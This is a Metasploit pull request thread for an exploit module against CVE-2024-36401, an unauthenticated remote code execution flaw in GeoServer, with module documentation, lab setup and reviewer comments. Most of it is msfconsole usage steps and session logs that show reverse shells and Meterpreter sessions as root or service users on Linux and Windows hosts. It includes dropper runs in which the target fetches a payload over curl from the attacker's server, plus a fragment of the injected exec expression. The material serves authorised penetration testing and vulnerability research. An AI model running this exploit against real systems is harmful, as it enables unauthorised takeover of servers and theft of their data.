GeoServer unauthenticated RCE [CVE-2024-36401]

[h00die-gr3y]

GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.

In the GeoServer versions prior to 2.23.6, between version 2.24.0 and 2.24.3 and in version 2.25.0, 2.25.1, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
An attacker can abuse this by sending a POST request with a malicious xpath expression to execute arbitrary commands as root on the system.

The following GeoServer releases are tested:

Osgeo.org Docker releases with Tomcat

• docker.osgeo.org/geoserver 2.25.0
• docker.osgeo.org/geoserver 2.24.2
• docker.osgeo.org/geoserver 2.23.2
• docker.osgeo.org/geoserver 2.23.0
• docker.osgeo.org/geoserver 2.21.1

Vulhub Docker releases with Jetty

• vulhub/geoserver 2.23.2
• vulhub/geoserver 2.22.1

Linux binary installs with Jetty

• geoserver 2.23.5 on x64 Ubuntu 22.04
• geoserver 2.23.5 on Raspberry PI-4 ARM64 Kali Linux 2024.4

Installation steps to install the GeoServer web application

• Follow these installation steps for platform-independent Linux binary.
• Follow these installation steps for osgeo.org/geoserver docker images.
• Use the docker-compose.yaml config file below to pull the vulhub geoserver docker images

version: '3'
services:
 web:
   image: vulhub/geoserver:2.23.2
   ports:
    - "8080:8080"
    - "5005:5005"

• Pull and install the docker image with docker compose up -d
• You should now be able to access the GeoServer web application via http://your_ip:8080/geoserver.

You are ready to test the module.

Verification Steps

• Start msfconsole
• use exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
• set rhosts <ip-target>
• set rport <port>
• set lhost <attacker-ip>
• set target <0=Unix Command, 1=Linux Dropper>
• exploit
• you should get a reverse shell or Meterpreter session depending on the payload and target settings

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > info

       Name: Geoserver unauthenticated Remote Code Execution
     Module: exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
   Platform: Unix, Linux
       Arch: cmd, x86, x64, aarch64, armle
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-07-01

Provided by:
  h00die-gr3y <[email protected]>
  Steve Ikeoka

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Unix Command
      1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                        cs/using-metasploit.html
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The URI path of the OpenMediaVault web application
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                       local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  GeoServer is an open-source software server written in Java that provides
  the ability to view, edit, and share geospatial data.
  It is designed to be a flexible, efficient solution for distributing geospatial data
  from a variety of sources such as Geographic Information System (GIS) databases,
  web-based data, and personal datasets.
  In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
  multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
  through specially crafted input against a default GeoServer installation due to unsafely
  evaluating property names as XPath expressions.
  An attacker can abuse this by sending a POST request with a malicious xpath expression
  to execute arbitrary commands as root on the system.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-36401
  https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
  https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
  https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401


View the full module info with the info -d command.

Scenarios

GeoServer 2.23.5 on x64 Ubuntu 22.04 - cmd/unix/reverse_bash

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set rhosts 192.168.201.86
rhosts => 192.168.201.86
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 7 opened (192.168.201.8:4444 -> 192.168.201.86:54072) at 2024-07-11 16:09:30 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux cuckoo 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
pwd
/usr/share/geoserver
exit

GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - cmd/unix/reverse_bash

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
target => 0
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-11 16:15:31 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-11) aarch64 GNU/Linux
pwd
/usr/share/geoserver
exit

GeoServer 2.23.2 on vulhub docker image - cmd/unix/reverse_bash

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
target => 0
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.42
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.42:60290) at 2024-07-11 18:42:08 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux e3f986905bde 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 GNU/Linux
pwd
/mnt/geoserver

GeoServer 2.23.2 on vulhub docker image - linux/x64/meterpreter_reverse_tcp

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set srvport 1981
srvport => 1981
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:1981/FEflDEJ
[*] Client 192.168.201.42 (curl/7.74.0) requested /FEflDEJ
[*] Sending payload to 192.168.201.42 (curl/7.74.0)
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 10 opened (192.168.201.8:4444 -> 192.168.201.42:60353) at 2024-07-11 18:48:02 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : Debian 11.3 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/mnt/geoserver
meterpreter >

GeoServer 2.25.0 on osgeo.org/geoserver docker image - linux/x64/meterpreter_reverse_tcp

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.25.0
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:1981/CEkJIBo
[*] Client 192.168.201.42 (curl/7.81.0) requested /CEkJIBo
[*] Sending payload to 192.168.201.42 (curl/7.81.0)
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:61350) at 2024-07-11 20:46:14 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 22.04 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/opt
meterpreter >

GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - linux/aarch64/meterpreter_reverse_tcp

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.5
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:1981/680jWmUv1qm
[*] Client 192.168.201.10 (curl/8.5.0) requested /680jWmUv1qm
[*] Sending payload to 192.168.201.10 (curl/8.5.0)
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Meterpreter session 12 opened (192.168.201.8:4444 -> 192.168.201.10:60692) at 2024-07-11 21:04:34 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/usr/share/geoserver
meterpreter >

Limitations

No limitations.

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[jheysel-r7]

Hey @h00die-gr3y, thanks for another great module and for adding the docs. I hope you don't mind me adding Windows support in 5d210b5. I saw the Windows installer and figure I'd take a crack at exploiting it. Let me know what you think of the addition.

So far everything looks good. I'll take another look tomorrow. Testing was as expected on both operating systems I tested.

Testing

Docker vulhub/geoserver:2.23.2

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.132:50888) at 2024-07-11 10:22:34 -0700

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux 0b1c264c3d26 6.5.0-41-generic #41~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Mon Jun  3 11:32:55 UTC 2 x86_64 GNU/Linux

Windows 10 GeoServer 2.25.0

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.25.0
[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
[*] Sending stage (201798 bytes) to 172.16.199.131
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:51235) at 2024-07-11 16:14:11 -0700

meterpreter > getuid
Server username: DESKTOP-N3ORU31\msfuser
meterpreter > sysinfo
Computer        : DESKTOP-N3ORU31
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Side note

I tried getting a Windows command stager target working for parity's sake although staged and stageless Meterpreter payloads both ending up failing. The staged payload failed because not all of the payload ends up getting base64 encoded and it runs into a parsing error

  <ows:Exception exceptionCode="OperationParsingFailed">
    <ows:ExceptionText>Request parsing failed
The entity name must immediately follow the &amp;apos;&amp;amp;&amp;apos; in the entity reference.</ows:ExceptionText>

And I think the stageless meterpreter payload is just too large:

  <ows:Exception exceptionCode="OperationProcessingFailed" locator="GetPropertyValue">
    <ows:ExceptionText>No such attribute: exec(java.lang.Runtime.getRuntime(), &amp;quot;echo <16000 bytes truncated> 

[h00die-gr3y]

@jheysel-r7 Thanks for the windows addition.
I tried myself but could not make it work ;-)

Quickly checked it on my Windows Server 2022 Standard installation.
Works as a charm!

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
[*] Sending stage (201798 bytes) to 192.168.201.2
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.2:49825) at 2024-07-12 12:25:51 +0000

meterpreter > sysinfo
Computer        : VICTIM
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : EVIL
Logged On Users : 6
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter >

[jheysel-r7]

@h00die-gr3y thanks for testing the Windows target so quickly. Teamwork makes the exploits work :)

I've added a couple more minor comments but other than those this looks like it's ready to be landed.

[jheysel-r7]

Release Notes

This adds an exploit module for CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer versions prior to 2.23.6, between version 2.24.0 and 2.24.3 and in version 2.25.0, 2.25.1.

[Chocapikk]

Hey @jheysel-r7 , @h00die-gr3y , @cgranleese-r7 !

I noticed that the Metasploit module for CVE-2024-36401 might not work if the expected FeatureTypes are deleted or replaced with custom ones. My exploit handles this by allowing custom FeatureTypes to be used, ensuring it still works. You can check out my code here for inspiration: https://github.com/Chocapikk/CVE-2024-36401/blob/main/exploit.py#L117 .

In short, it just grab all the FeatureTypes without filtering as in the module.

Improving the module to dynamically detect and validate available FeatureTypes could make it more robust.

cc: @wvu

[h00die-gr3y]

@Chocapikk ,
I reviewed your code. Indeed a good suggestion.
Let me open a PR to add your code at the module.